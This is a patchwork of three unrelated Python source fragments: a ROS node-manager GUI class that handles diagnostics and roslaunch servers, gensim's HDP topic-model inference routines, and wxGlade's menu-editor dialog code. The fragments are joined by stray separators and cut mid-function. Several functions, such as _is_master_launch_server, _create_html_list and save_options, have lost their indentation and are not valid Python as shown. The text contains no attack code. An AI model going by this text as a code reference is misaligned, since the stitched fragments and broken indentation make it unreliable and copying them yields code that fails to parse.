    :return: True when diagnostics support is available, else False
    '''
    if not DIAGNOSTICS_AVAILABLE:
        return False
    status = DiagnosticStatus()
    status.name = node_name
    status.level = DiagnosticStatus.OK
    status.message = ''
    self.append_diagnostic(status)
    return True
def update_system_diagnostics(self, diagnostics):
    '''Push new system diagnostics into the node tree model.

    Also refreshes the description panel when exactly one host is
    selected and it is the local one.
    '''
    self.node_tree_model.update_system_diagnostics(self.masteruri, diagnostics)
    selections = self.ui.nodeTreeView.selectionModel().selectedIndexes()
    selectedNodes = self.hostsFromIndexes(selections)
    if len(selectedNodes) == 1:
        if selectedNodes[0].local:
            self.on_node_selection_changed(None, None)
def append_diagnostic(self, diagnostic_status, isnew=True):
    '''Attach a diagnostic status to the matching tree node(s).

    :param diagnostic_status: the status message to attach
    :param bool isnew: when True and no node matches yet, the message is
        buffered so it can be replayed once the node is detected
    :return: True when at least one node received the status
    '''
    result = False
    # master_sync diagnostics are only accepted from our own host.
    if (diagnostic_status.name == '/master_sync'):
        if get_hostname(self.masteruri) != diagnostic_status.hardware_id:
            return False
    nodes = self.getNode(diagnostic_status.name)
    for node in nodes:
        node.append_diagnostic_status(diagnostic_status)
        result = True
    if nodes:
        # Refresh the detail panel if the updated node is selected.
        selections = self.ui.nodeTreeView.selectionModel().selectedIndexes()
        selectedNodes = self.nodesFromIndexes(selections)
        if len(selectedNodes) == 1:
            node = selectedNodes[0]
            if node.name == diagnostic_status.name:
                self.on_node_selection_changed(None, None)
    elif isnew:
        # store to have messages received before node was detected
        self._stored_diagnostic_messages[time.time()] = diagnostic_status
    return result
def sysmon_active_update(self):
    '''Toggle the periodic system-monitor polling.

    Starts a 1 Hz QTimer when monitoring is off, stops and discards it
    when it is on, and updates the tree model state accordingly.
    '''
    if self._sysmon_timer is None:
        self._sysmon_timer = QTimer()
        self._sysmon_timer.timeout.connect(self._sysmon_update_callback)
        self._sysmon_timer.start(1000)
        self.node_tree_model.sysmon_set_state(self.masteruri, True)
    else:
        self._sysmon_timer.stop()
        self._sysmon_timer = None
        self.node_tree_model.sysmon_set_state(self.masteruri, False)
    # update host description
    selections = self.ui.nodeTreeView.selectionModel().selectedIndexes()
    selectedNodes = self.hostsFromIndexes(selections)
    if len(selectedNodes) == 1:
        if selectedNodes[0].local:
            self.on_node_selection_changed(None, None)
def _sysmon_update_callback(self):
    '''Timer slot: poll system diagnostics through the daemon; for
    remote masters also poll the regular diagnostics.
    '''
    if not (self._has_nmd and self.__online):
        return
    nm.nmd().monitor.get_system_diagnostics_threaded(nmdurl.nmduri(self.masteruri))
    if not nm.is_local(self.mastername):
        nm.nmd().monitor.get_diagnostics_threaded(nmdurl.nmduri(self.masteruri))
@property
def launch_servers(self):
    '''Known roslaunch servers as a dict: server URI -> (pid, node list).'''
    return self.__launch_servers
def has_launch_server(self):
    '''
    Returns `True` if at least one roslaunch server hosts something
    beyond the `master`/`rosout-#` bookkeeping nodes.
    '''
    return any(not self._is_master_launch_server(nodes)
               for _, nodes in self.__launch_servers.values())
def _is_master_launch_server(self, nodes):
if 'master' in nodes and len(nodes) < 3:
return True
return False
def on_launch_server_retrieved(self, serveruri, pid, nodes):
    '''
    Handles the info about roslaunch server.
    Emits a Qt signal L{host_description_updated} to notify about a new host
    description and a Qt signal L{capabilities_update_signal} to notify about a capabilities
    update.
    :param str serveruri: the URI of the roslaunch server
    :param str pid: the process id of the roslaunch server
    :param list(str) nodes: list with nodes handled by the roslaunch server
    '''
    # NOTE(review): the docstring mentions emitted signals, but this
    # method only records the server info -- verify against callers.
    self.__launch_servers[serveruri] = (pid, nodes)
def on_launch_server_err(self, serveruri, msg):
    '''
    Handles the error messages from the launch server handler by
    forgetting the failed server.
    :param str serveruri: the URI of the launch server
    :param str msg: the error message
    '''
    try:
        self.__launch_servers.pop(serveruri)
    except Exception:
        pass
def on_remove_all_launch_server(self):
    '''
    Kill all running launch server. The coresponding URIS are removed by master_monitor.
    '''
    for lsuri, (pid, nodes) in self.__launch_servers.items():
        try:
            # Keep servers that only host the master node; kill the rest
            # through the progress queue so the user sees the action.
            if not self._is_master_launch_server(nodes):
                self._progress_queue.add2queue(utf8(uuid.uuid4()),
                                               'kill roslaunch %s (%s)' % (lsuri, utf8(pid)),
                                               nm.starter().kill,
                                               {'host': get_hostname(lsuri),
                                                'pid': pid,
                                                'auto_pw_request': False,
                                                'user': self.current_user
                                                })
                # Re-query the server info shortly after the kill.
                self.launch_server_handler.updateLaunchServerInfo(lsuri, delayed_exec=3.0)
        except Exception as e:
            rospy.logwarn("Error while kill roslaunch %s: %s", utf8(lsuri), utf8(e))
            raise DetailedError("Kill error",
                                ''.join(['Error while kill roslaunch ', lsuri]),
                                utf8(e))
    self._start_queue(self._progress_queue)
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# %%%%%%%%%%%%% Handling of the view activities %%%%%%%%
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
def on_node_activated(self, index):
    '''
    Depending on the state of the node, it will be run (any selected node is
    stopped) or the screen output will be opened (all selected nodes run).
    :param index: The index of the activated node
    :type index: :class:`QtCore.QModelIndex`
    '''
    self.__last_node_activation = time.time()
    selectedNodes = []
    if index.column() == 0:
        selectedNodes = self.nodesFromIndexes(self.ui.nodeTreeView.selectionModel().selectedIndexes(), False)
    if not selectedNodes:
        return
    # classify the selection; stopped nodes take precedence below
    # (a previously computed `has_invalid` flag was never read and was removed)
    has_running = False
    has_stopped = False
    for node in selectedNodes:
        if node.uri is not None:
            has_running = True
        else:
            has_stopped = True
    if has_stopped:
        self.on_start_clicked()
    elif has_running:
        self.on_io_clicked(activated=True)
def on_node_clicked(self, index):
    """Hides transient question frames and refreshes the node selection info,
    both throttled to once per second after the last activation/selection."""
    now = time.time()
    if now - self.__last_node_activation > 1.:
        self.message_frame.hide_question([MessageFrame.TYPE_NODELET])
        self.info_frame.hide_question([MessageFrame.TYPE_NOSCREEN])
    if now - self.__last_selection > 1.:
        self.on_node_selection_changed(None, None, True)
def on_topic_activated(self, index):
    '''
    Opens an echo dialog for the double-clicked topic.
    :param index: The index of the activated topic
    :type index: :class:`QtCore.QModelIndex`
    '''
    src_index = self.topic_proxyModel.mapToSource(index)
    entry = self.topic_model.itemFromIndex(src_index)
    if isinstance(entry, TopicItem):
        self.on_topic_echo_clicked([entry.topic])
def on_topic_clicked(self, index):
    """Refreshes the topic info view, throttled to once per second."""
    if time.time() - self.__last_selection <= 1.:
        return
    self.on_topic_selection_changed(None, None, True)
def on_service_activated(self, index):
    '''
    Opens the call dialog for the double-clicked service.
    :param index: The index of the activated service
    :type index: :class:`QtCore.QModelIndex`
    '''
    src_index = self.service_proxyModel.mapToSource(index)
    entry = self.service_model.itemFromIndex(src_index)
    if isinstance(entry, ServiceItem):
        self.on_service_call_clicked([entry.service])
def on_service_clicked(self, index):
    """Refreshes the service info view, throttled to once per second."""
    if time.time() - self.__last_selection <= 1.:
        return
    self.on_service_selection_changed(None, None, True)
def on_host_inserted(self, item):
    """Expands the tree item of the local master host as soon as it appears."""
    local_host = (self.masteruri, nm.nameres().hostname(get_hostname(self.masteruri)))
    if item != local_host:
        return
    source_index = self.node_tree_model.indexFromItem(item)
    proxy_index = self.node_proxy_model.mapFromSource(source_index)
    if proxy_index.isValid():
        self.ui.nodeTreeView.expand(proxy_index)
def on_node_collapsed(self, index):
    """Clears the node selection whenever a top-level (host) item collapses."""
    if index.parent().isValid():
        return
    self.ui.nodeTreeView.selectionModel().clear()
def on_node_expanded(self, index):
    # Intentionally a no-op: expanding a node needs no extra bookkeeping,
    # but the slot must exist for the view's signal connection.
    pass
def _create_html_list(self, title, items, list_type=None, name=''):
'''
:param list_type: LAUNCH, TOPIC, NODE, SERVICE
:type list_type: str
'''
result = ''
if items:
result = '<b><u>%s</u></b>' % (title)
if len(items) > 1:
result = '%s <span style="color:gray;">[%d]</span>' % (result, len(items))
result = '%s<table style="display: inline-table">' % result
items.sort()
for i in items:
item = i
# reduce the displayed name
item_name = i
if name:
if item_name.startswith(name):
item_name = item_name.replace('%s%s' % (name, roslib.names.SEP), '~', 1)
ns = roslib.names.namespace(name)
if item_name.startswith(ns) and ns != roslib.names.SEP:
item_name = item_name.replace(ns, '', 1)
if list_type in ['NODE']:
item = '<tr>'
item += '<td><a href="node://%s%s">%s</a><td>' % (self.mastername, i, item_name)
item += '</tr>'
elif list_type in ['TOPIC_PUB', 'TOPIC_SUB']:
# determine the count of publisher or subscriber
count = None
try:
tpc = self.__master_info.getTopic(i)
if list_type == 'TOPIC_SUB':
count = len(tpc.publisherNodes)
if name not in tpc.subscriberNodes:
count = None
else:
count = len(tpc.subscriberNodes)
if name not in tpc.publisherNodes:
count = None
except Exception:
pass
# add the count
if count is not None:
item = '<tr>'
item += '<td><span style="color:gray;">%d</span><td>' % (count)
item += '<td><a href="topicecho://%s%s"><span style="color:gray;"><i>echo</i></span></a><td>' % (self.mastername, i)
item += '<td><a href="topic://%s">%s</a><td>' % (i, item_name)
#sekkyumu_topic_echo_24 = nm.settings().icon_path('sekkyumu_topic_echo_24.png')
#item += '<td><a href="topicecho://%s%s" title="Show the content of the topic"><img src="%s" alt="echo"></a></td>' % (self.mastername, i, sekkyumu_topic_echo_24)
item += '</tr>'
else:
item = '<tr>'
item += '<td colspan="3" style="float:left"><span style="color:red;">!sync </span><a>%s</a><td>' % (item_name)
item += '</tr>'
elif list_type == 'SERVICE':
try:
srv = self.__master_info.getService(i)
if srv is not None and name in srv.serviceProvider:
item = '<tr>'
item += '<td><a href="servicecall://%s%s"><span style="color:gray;"><i>call</i></span></a><td>' % (self.mastername, i)
item += '<td><a href="service://%s%s">%s</a><td>' % (self.mastername, i, item_name)
item += '</tr>'
else:
item = '<tr>'
item += '<td colspan="2" style="float:left"><span style="color:red;">!sync </span>%s<td>' % (item_name)
item += '</tr>'
except Exception:
item = '<tr>'
item += '<td colspan="2" style="float:left"><span style="color:red;">?sync </span>%s<td>' % (item_name)
item += '</tr>'
elif list_type == 'LAUNCH':
if i in self.__configs and self.__configs[i].global_param_done:
item = '<tr>'
item_ref = '<a href="%s">%s</a>' % (i.replace('grpc://', 'open-edit://'), os.path.basename(item_name))
item += '<td>%s<td>' % (item_ref)
pkg, _path = nm.nmd().file.package_name(i)
item += '<td><i>%s</i><td>' % (os.path.dirname(item_name) if pkg is None else pkg)
item += '</tr>'
result += item
result += '</table>\n<br>'
return result
def on_tab_current_changed(self, index):
tab_name = self.ui.tabWidget.currentWidget().objectName()
if tab_name == 'tabTopics':
# select the topics of the selected node in the "Topic" view
selections = self.ui.nodeTreeView.selectionModel().selectedIndexes()
selectedNodes = self.nodesFromIndexes(selections)
if len(selectedNodes) == 1:
node = selectedNodes[0]
selected_topics = self.topic_model.index_from_names(node.published, node.subscribed)
for s in selected_topics:
self.ui.topicsView.selectionModel().select(self.topic_proxyModel.mapFromSource(s), QItemSelectionModel.Select)
elif tab_name == 'tabServices':
# select the services of the selected node in the "Services" view
selections = | |
chunk:
if len(doc) > 0:
doc_word_ids, doc_word_counts = zip(*doc)
doc_score = self.doc_e_step(
ss, Elogsticks_1st,
unique_words, doc_word_ids,
doc_word_counts, self.m_var_converge
)
count += sum(doc_word_counts)
score += doc_score
if update:
self.update_lambda(ss, word_list, opt_o)
return score, count
def doc_e_step(self, ss, Elogsticks_1st, unique_words, doc_word_ids, doc_word_counts, var_converge):
    """Performs E step for a single doc.
    Parameters
    ----------
    ss : :class:`~gensim.models.hdpmodel.SuffStats`
        Stats for all document(s) in the chunk; updated in place at the end.
    Elogsticks_1st : numpy.ndarray
        Computed Elogsticks value by stick-breaking process.
    unique_words : dict of (int, int)
        Number of unique words in the chunk.
    doc_word_ids : iterable of int
        Word ids of for a single document.
    doc_word_counts : iterable of int
        Word counts of all words in a single document.
    var_converge : float
        Lower bound on the right side of convergence. Used when updating variational parameters for a single
        document.
    Returns
    -------
    float
        Computed value of likelihood for a single document.
    """
    # map global word ids to their column positions in the chunk's stats
    chunkids = [unique_words[id] for id in doc_word_ids]
    Elogbeta_doc = self.m_Elogbeta[:, doc_word_ids]
    # very similar to the hdp equations
    v = np.zeros((2, self.m_K - 1))
    v[0] = 1.0
    v[1] = self.m_alpha
    # back to the uniform
    phi = np.ones((len(doc_word_ids), self.m_K)) * 1.0 / self.m_K
    likelihood = 0.0
    old_likelihood = -1e200
    converge = 1.0
    # NOTE: `iter` shadows the builtin; it is purely a loop counter here
    iter = 0
    max_iter = 100
    # not yet support second level optimization yet, to be done in the future
    while iter < max_iter and (converge < 0.0 or converge > var_converge):
        # update variational parameters
        # var_phi -- first 3 iterations run without the stick weights to
        # stabilize the estimates before coupling them
        if iter < 3:
            var_phi = np.dot(phi.T, (Elogbeta_doc * doc_word_counts).T)
            (log_var_phi, log_norm) = matutils.ret_log_normalize_vec(var_phi)
            var_phi = np.exp(log_var_phi)
        else:
            var_phi = np.dot(phi.T, (Elogbeta_doc * doc_word_counts).T) + Elogsticks_1st
            (log_var_phi, log_norm) = matutils.ret_log_normalize_vec(var_phi)
            var_phi = np.exp(log_var_phi)
        # phi
        if iter < 3:
            phi = np.dot(var_phi, Elogbeta_doc).T
            (log_phi, log_norm) = matutils.ret_log_normalize_vec(phi)
            phi = np.exp(log_phi)
        else:
            # Elogsticks_2nd is assigned at the bottom of every iteration,
            # so it is always defined once iter >= 3 (hence the noqa)
            phi = np.dot(var_phi, Elogbeta_doc).T + Elogsticks_2nd  # noqa:F821
            (log_phi, log_norm) = matutils.ret_log_normalize_vec(phi)
            phi = np.exp(log_phi)
        # v -- update the document-level stick-breaking proportions
        phi_all = phi * np.array(doc_word_counts)[:, np.newaxis]
        v[0] = 1.0 + np.sum(phi_all[:, :self.m_K - 1], 0)
        phi_cum = np.flipud(np.sum(phi_all[:, 1:], 0))
        v[1] = self.m_alpha + np.flipud(np.cumsum(phi_cum))
        Elogsticks_2nd = expect_log_sticks(v)
        likelihood = 0.0
        # compute likelihood
        # var_phi part/ C in john's notation
        likelihood += np.sum((Elogsticks_1st - log_var_phi) * var_phi)
        # v part/ v in john's notation, john's beta is alpha here
        log_alpha = np.log(self.m_alpha)
        likelihood += (self.m_K - 1) * log_alpha
        dig_sum = psi(np.sum(v, 0))
        likelihood += np.sum((np.array([1.0, self.m_alpha])[:, np.newaxis] - v) * (psi(v) - dig_sum))
        likelihood -= np.sum(gammaln(np.sum(v, 0))) - np.sum(gammaln(v))
        # Z part
        likelihood += np.sum((Elogsticks_2nd - log_phi) * phi)
        # X part, the data part
        likelihood += np.sum(phi.T * np.dot(var_phi, Elogbeta_doc * doc_word_counts))
        converge = (likelihood - old_likelihood) / abs(old_likelihood)
        old_likelihood = likelihood
        if converge < -0.000001:
            logger.warning('likelihood is decreasing!')
        iter += 1
    # update the suff_stat ss
    # this time it only contains information from one doc
    ss.m_var_sticks_ss += np.sum(var_phi, 0)
    ss.m_var_beta_ss[:, chunkids] += np.dot(var_phi.T, phi.T * doc_word_counts)
    return likelihood
def update_lambda(self, sstats, word_list, opt_o):
    """Update appropriate columns of lambda and top level sticks based on documents.
    Parameters
    ----------
    sstats : :class:`~gensim.models.hdpmodel.SuffStats`
        Statistic for all document(s) in the chunk.
    word_list : list of int
        Contains word id of all the unique words in the chunk of documents on which update is being performed.
    opt_o : bool, optional
        If True - invokes a call to :meth:`~gensim.models.hdpmodel.HdpModel.optimal_ordering` to order the topics.
    """
    # lambda (and hence Elogbeta) is stale until update_expectations() runs
    self.m_status_up_to_date = False
    # rhot will be between 0 and 1, and says how much to weight
    # the information we got from this mini-chunk.
    rhot = self.m_scale * pow(self.m_tau + self.m_updatect, -self.m_kappa)
    if rhot < rhot_bound:
        rhot = rhot_bound
    self.m_rhot = rhot
    # Update appropriate columns of lambda based on documents.
    self.m_lambda[:, word_list] = \
        self.m_lambda[:, word_list] * (1 - rhot) + rhot * self.m_D * sstats.m_var_beta_ss / sstats.m_chunksize
    self.m_lambda_sum = (1 - rhot) * self.m_lambda_sum + \
        rhot * self.m_D * np.sum(sstats.m_var_beta_ss, axis=1) / sstats.m_chunksize
    # record when each updated column was last touched; m_r accumulates the
    # log-decay applied lazily by update_expectations()
    self.m_updatect += 1
    self.m_timestamp[word_list] = self.m_updatect
    self.m_r.append(self.m_r[-1] + np.log(1 - rhot))
    self.m_varphi_ss = \
        (1.0 - rhot) * self.m_varphi_ss + rhot * sstats.m_var_sticks_ss * self.m_D / sstats.m_chunksize
    if opt_o:
        self.optimal_ordering()
    # update top level sticks
    self.m_var_sticks[0] = self.m_varphi_ss[:self.m_T - 1] + 1.0
    var_phi_sum = np.flipud(self.m_varphi_ss[1:])
    self.m_var_sticks[1] = np.flipud(np.cumsum(var_phi_sum)) + self.m_gamma
def optimal_ordering(self):
    """Reorders the topics by descending total lambda mass."""
    order = matutils.argsort(self.m_lambda_sum, reverse=True)
    # all topic-indexed state must be permuted consistently
    self.m_lambda_sum = self.m_lambda_sum[order]
    self.m_varphi_ss = self.m_varphi_ss[order]
    self.m_Elogbeta = self.m_Elogbeta[order, :]
    self.m_lambda = self.m_lambda[order, :]
def update_expectations(self):
    """Since we're doing lazy updates on lambda, at any given moment the current state of lambda may not be
    accurate. This function updates all of the elements of lambda and Elogbeta so that if (for example) we want to
    print out the topics we've learned we'll get the correct behavior.
    """
    # Vectorized over the vocabulary (replaces a per-word Python loop):
    # column w carries the decay exp(m_r[-1] - m_r[timestamp[w]]) accumulated
    # since it was last touched by update_lambda().
    # Assumes m_timestamp is an integer index array — it is used to index the
    # m_r list per word and is bulk-assigned below; TODO confirm dtype.
    decay = np.exp(self.m_r[-1] - np.asarray(self.m_r)[self.m_timestamp])
    self.m_lambda *= decay
    self.m_Elogbeta = \
        psi(self.m_eta + self.m_lambda) - psi(self.m_W * self.m_eta + self.m_lambda_sum[:, np.newaxis])
    # all columns are now current
    self.m_timestamp[:] = self.m_updatect
    self.m_status_up_to_date = True
def show_topic(self, topic_id, topn=20, log=False, formatted=False, num_words=None):
    """Return the `topn` most probable words for topic `topic_id`.

    Parameters
    ----------
    topic_id : int
        Index of the topic to display.
    topn : int, optional
        Number of most probable words to show.
    log : bool, optional
        If True - logs a message with level INFO on the logger object.
    formatted : bool, optional
        If True - strings, otherwise lists of (weight, word) pairs.
    num_words : int, optional
        DEPRECATED, USE `topn` INSTEAD (overrides `topn` when given).

    Returns
    -------
    list of (str, numpy.float) **or** list of str
        Topic terms, format depending on `formatted`.
    """
    if num_words is not None:
        # honor the deprecated parameter but warn about it
        warnings.warn(
            "The parameter `num_words` is deprecated, will be removed in 4.0.0, please use `topn` instead."
        )
        topn = num_words
    if not self.m_status_up_to_date:
        self.update_expectations()
    term_weights = self.m_lambda + self.m_eta
    formatter = HdpTopicFormatter(self.id2word, term_weights)
    return formatter.show_topic(topic_id, topn, log, formatted)
def get_topics(self):
    """Get the term topic matrix learned during inference.
    Returns
    -------
    np.ndarray
        `num_topics` x `vocabulary_size` array of floats; each row sums to 1.
    """
    weights = self.m_lambda + self.m_eta
    row_totals = weights.sum(axis=1)[:, np.newaxis]
    return weights / row_totals
def show_topics(self, num_topics=20, num_words=20, log=False, formatted=True):
    """Return the `num_words` most probable words for `num_topics` topics.

    Parameters
    ----------
    num_topics : int, optional
        Number of topics to fetch; -1 means all topics.
    num_words : int, optional
        Number of most probable words per topic.
    log : bool, optional
        If True - log a message with level INFO on the logger object.
    formatted : bool, optional
        If True - strings, otherwise lists of (weight, word) pairs.

    Returns
    -------
    list of (str, numpy.float) **or** list of str
        Topic terms, format depending on `formatted`.
    """
    if not self.m_status_up_to_date:
        self.update_expectations()
    term_weights = self.m_lambda + self.m_eta
    formatter = HdpTopicFormatter(self.id2word, term_weights)
    return formatter.show_topics(num_topics, num_words, log, formatted)
@deprecated("This method will be removed in 4.0.0, use `save` instead.")
def save_topics(self, doc_count=None):
    """Save discovered topics.
    Warnings
    --------
    This method is deprecated, use :meth:`~gensim.models.hdpmodel.HdpModel.save` instead.
    Parameters
    ----------
    doc_count : int, optional
        Indicates number of documents finished processing and are to be saved.
    """
    if not self.outputdir:
        logger.error("cannot store topics without having specified an output directory")
        # fix: bail out like save_options() does — without an output
        # directory the path below would be built from a missing prefix
        return
    if doc_count is None:
        fname = 'final'
    else:
        fname = 'doc-%i' % doc_count
    fname = '%s/%s.topics' % (self.outputdir, fname)
    logger.info("saving topics to %s", fname)
    betas = self.m_lambda + self.m_eta
    np.savetxt(fname, betas)
@deprecated("This method will be removed in 4.0.0, use `save` instead.")
def save_options(self):
"""Writes all the values of the attributes for the current model in "options.dat" file.
Warnings
--------
This method is deprecated, use :meth:`~gensim.models.hdpmodel.HdpModel.save` instead.
"""
if not self.outputdir:
logger.error("cannot store options without having specified an output directory")
return
fname = '%s/options.dat' % self.outputdir
with utils.open(fname, 'wb') as fout:
fout.write('tau: %s\n' % str(self.m_tau - 1))
fout.write('chunksize: %s\n' % str(self.chunksize))
| |
following item -> move up the following item
self._move_item_left(index)
#self.selected_index = index-1
for s in (self.name, self.id, self.label, self.help_str, self.event_handler):
s.SetValue("")
self.check_radio.SetSelection(0)
self.menu_items.DeleteItem(self.selected_index)
if not self.menu_items.GetItemCount():
self._enable_fields(False)
self.selected_index -= 1
self.menu_items.Select(self.selected_index)
def add_items(self, menus):
    """adds the content of 'menus' to self.menu_items. menus is a sequence of
    trees which describes the structure of the menus.
    Column layout of the list control: 0=indented label, 1=handler, 2=name,
    3=item type (''/0/1/2), 4=help string, 5=id."""
    indent = " " * 4
    # wxPython Classic and Phoenix expose different item APIs
    if compat.IS_CLASSIC:
        set_item = self.menu_items.SetStringItem
        add_item = self.menu_items.InsertStringItem
    else:
        set_item = self.menu_items.SetItem
        add_item = self.menu_items.InsertItem
    # one-element list so the nested function can mutate the row counter
    index = [0]
    def add(node, level):
        i = index[0]
        # tabs are escaped so accelerators stay visible in the list
        add_item(i, misc.wxstr(indent * level + node.label.lstrip().replace("\t","\\t")))
        set_item(i, 1, misc.wxstr(node.handler))
        set_item(i, 2, misc.wxstr(node.name))
        set_item(i, 4, misc.wxstr(node.help_str))
        set_item(i, 5, misc.wxstr(node.id))
        if node.label==node.name==node.id=='---':
            # separator rows carry no item type
            set_item(i, 3, '')
        else:
            item_type = 0
            try:
                if node.checkable and int(node.checkable):
                    item_type = 1
                elif int(node.radio):
                    item_type = 2
            except ValueError:
                pass
            set_item(i, 3, misc.wxstr(item_type))
        index[0] += 1
        for item in node.children:
            add(item, level+1)
    for tree in menus:
        add(tree.root, 0)
    if self.menu_items.GetItemCount():
        self._enable_fields()
def get_menus(self):
    """returns the contents of self.menu_items as a list of trees which
    describe the structure of the menus in the format used by EditMenuBar.
    Column layout (mirrors add_items): 0=indented label, 1=handler, 2=name,
    3=item type, 4=help string, 5=id."""
    def get(i, j): return self.menu_items.GetItem(i, j).GetText()
    trees = []
    def add(node, index):
        label = get(index, 0).lstrip().replace("\\t", "\t")
        id = get(index, 5)
        name = get(index, 2)
        help_str = get(index, 4)
        event_handler = get(index, 1)
        try:
            item_type = int(get(index, 3))
        except ValueError:
            item_type = 0
        # ternaries replace the legacy `cond and a or b` idiom
        checkable = misc.wxstr("1") if item_type == 1 else misc.wxstr("")
        radio = misc.wxstr("1") if item_type == 2 else misc.wxstr("")
        n = MenuTree.Node(label, id, name, help_str, checkable, radio, handler=event_handler)
        node.children.append(n)
        n.parent = node
        return n
    level = 0
    curr_item = None
    for index in range(self.menu_items.GetItemCount()):
        label = get(index, 0).replace("\\t", "\t")
        lvl = self.item_level(index)  # get the indentation level
        if not lvl:
            # top-level row starts a new menu tree
            t = MenuTree( get(index, 2), label, id=get(index, 5), handler=get(index, 1) )
            curr_item = t.root
            level = 1
            trees.append(t)
            continue
        elif lvl < level:
            # dedent: climb back up to the matching parent
            for i in range(level-lvl):
                curr_item = curr_item.parent
            level = lvl
        elif lvl > level:
            # indent: the previous child becomes the new parent
            curr_item = curr_item.children[-1]
            level = lvl
        add(curr_item, index)
    return trees
def _move_item_left(self, index):
    """Outdents row `index` by one level (strips 4 leading label spaces)."""
    if index <= 0:
        return
    # a row that still owns an indented child right below it cannot move left
    if index + 1 < self.menu_items.GetItemCount() and self.item_level(index) < self.item_level(index + 1):
        return
    label = self.menu_items.GetItem(index, 0).GetText()
    if label.startswith(" " * 4):
        self.menu_items.SetStringItem(index, 0, label[4:])
        self.menu_items.SetItemState(index, wx.LIST_STATE_SELECTED, wx.LIST_STATE_SELECTED)
        self._enable_buttons()
def move_item_left(self, event):
    """Moves the selected menu item one level up in the hierarchy, i.e.
    shifts its label 4 spaces left in self.menu_items."""
    # keep keyboard focus on the list so the selection stays visible
    self.menu_items.SetFocus()
    self._move_item_left(self.selected_index)
def _move_item_right(self, index):
    """Indents row `index` by one level (prepends 4 spaces to its label)."""
    # indenting is only legal below a row at the same or deeper level
    if index <= 0 or self.item_level(index) > self.item_level(index - 1):
        return
    label = self.menu_items.GetItem(index, 0).GetText()
    self.menu_items.SetStringItem(index, 0, misc.wxstr(" "*4) + label)
    self.menu_items.SetItemState(index, wx.LIST_STATE_SELECTED, wx.LIST_STATE_SELECTED)
    self._enable_buttons()
def move_item_right(self, event):
    """Moves the selected menu item one level down in the hierarchy, i.e.
    shifts its label 4 spaces right in self.menu_items."""
    # keep keyboard focus on the list so the selection stays visible
    self.menu_items.SetFocus()
    self._move_item_right(self.selected_index)
def move_item_up(self, event):
    "moves the selected menu item before the previous one at the same level in self.menu_items"
    self.menu_items.SetFocus()
    new_index = self._do_move_item(event, self.selected_index, False)
    if new_index is None:
        return
    sel_state = wx.LIST_STATE_SELECTED | wx.LIST_STATE_FOCUSED
    self.menu_items.SetItemState(new_index, sel_state, sel_state)
def _do_move_item(self, event, index, is_down):
    """internal function used by move_item_up and move_item_down.
    Moves the row at `index` together with its indented children past the
    previous sibling at the same level.
    Returns the new index of the moved item, or None if no change occurred."""
    if index <= 0: return None
    def get(i, j): return self.menu_items.GetItem(i, j).GetText()
    def getall(i): return [get(i, j) for j in range(6)]
    level = self.item_level(index)
    # collect the row and every deeper-indented row below it (its subtree)
    items_to_move = [ getall(index) ]
    i = index+1
    while i < self.menu_items.GetItemCount():
        if level < self.item_level(i):
            items_to_move.append(getall(i))
            i += 1
        else: break
    # find the previous sibling at the same level; give up if we would
    # cross a shallower row (no sibling above within this parent)
    i = index-1
    while i >= 0:
        lvl = self.item_level(i)
        if level == lvl: break
        elif level > lvl: return None
        i -= 1
    del_item = self.menu_items.DeleteItem
    ins_item = self.menu_items.InsertStringItem
    set_item = self.menu_items.SetStringItem  # renamed: `set` shadowed the builtin
    for j in range(len(items_to_move)-1, -1, -1):
        del_item(index+j)
    items_to_move.reverse()
    # tuple names follow the list's column layout established by add_items:
    # 0=label, 1=handler, 2=name, 3=item type, 4=help string, 5=id
    for label, handler, name, item_type, help_str, item_id in items_to_move:
        i = ins_item(i, label)
        set_item(i, 1, handler)
        set_item(i, 2, name)
        set_item(i, 3, item_type)
        set_item(i, 4, help_str)
        set_item(i, 5, item_id)
    ret_idx = i
    if is_down: ret_idx += len(items_to_move)
    return ret_idx
def move_item_down(self, event):
    """moves the selected menu item after the next one at the same level
    in self.menu_items (implemented as moving the *next* sibling up)."""
    self.menu_items.SetFocus()
    index = self.selected_index
    self.selected_index = -1
    if index < 0: return
    # (dead local helpers `get`/`getall` removed: they were never used here)
    level = self.item_level(index)
    # skip over the current row's indented children to find the next sibling
    i = index+1
    while i < self.menu_items.GetItemCount():
        if level < self.item_level(i):
            i += 1
        else: break
    if i < self.menu_items.GetItemCount():
        # _do_move_item works with selected_index, so we must assign to
        # it the right value before the call
        self.selected_index = self._do_move_item(event, i, True)
        # fix bug 698071
        state = wx.LIST_STATE_SELECTED | wx.LIST_STATE_FOCUSED
        self.menu_items.SetItemState(self.selected_index, state, state)
    else:
        # restore the selected index
        self.selected_index = index
# the action buttons are not linked to ESC and Enter to avoid accidental modifications
def on_cancel(self, event):
    # close the dialog discarding edits; the caller checks ShowModal's result
    self.EndModal(wx.ID_CANCEL)
def on_OK(self, event):
    # close the dialog accepting edits; the caller checks ShowModal's result
    self.EndModal(wx.ID_OK)
class MenuProperty(np.Property):
    "Property to edit the menus of an EditMenuBar instance"
    # NOTE(review): `np` here is wxGlade's property module (np.Property base
    # class), not numpy — confirm against the file's imports.

    def __init__(self):
        # the property value is the list of MenuTree instances
        np.Property.__init__(self, [])
        #self.menu_items = {}

    def create_editor(self, panel, sizer):
        # the property is edited via a modal dialog, so the in-panel editor
        # is just a button that opens it
        self.edit_btn = wx.Button(panel, -1, _("Edit menus..."))
        sizer.Add(self.edit_btn, 0, wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT, 4)
        self.edit_btn.Bind(wx.EVT_BUTTON, self.edit_menus)

    def edit_menus(self, event=None):
        # prefer the edit button's window as dialog parent, then the owner's
        # widget, else no parent
        if hasattr(self, "edit_btn") and self.edit_btn:
            parent = self.edit_btn.GetTopLevelParent()
        elif self.owner.widget:
            parent = self.owner.widget.GetTopLevelParent()
        else:
            parent = None
        dialog = MenuItemDialog( parent, self.owner, items=self.value )
        # start with one empty row so the dialog is editable for a new menubar
        if not self.value: dialog.add_item(None)
        if dialog.ShowModal() == wx.ID_OK:
            self.on_value_edited(dialog.get_menus())
        dialog.Destroy()

    def write(self, output, tabs):
        # serialize every menu tree inside a single <menus> XML tag
        inner_xml = []
        for menu in self.get():
            menu.write(inner_xml, tabs+1)
        output.extend( common.format_xml_tag( u'menus', inner_xml, tabs, is_xml=True ) )
class MenuHandler(BaseXmlBuilderTagHandler):
    """XML tag handler that rebuilds MenuTree structures from a saved
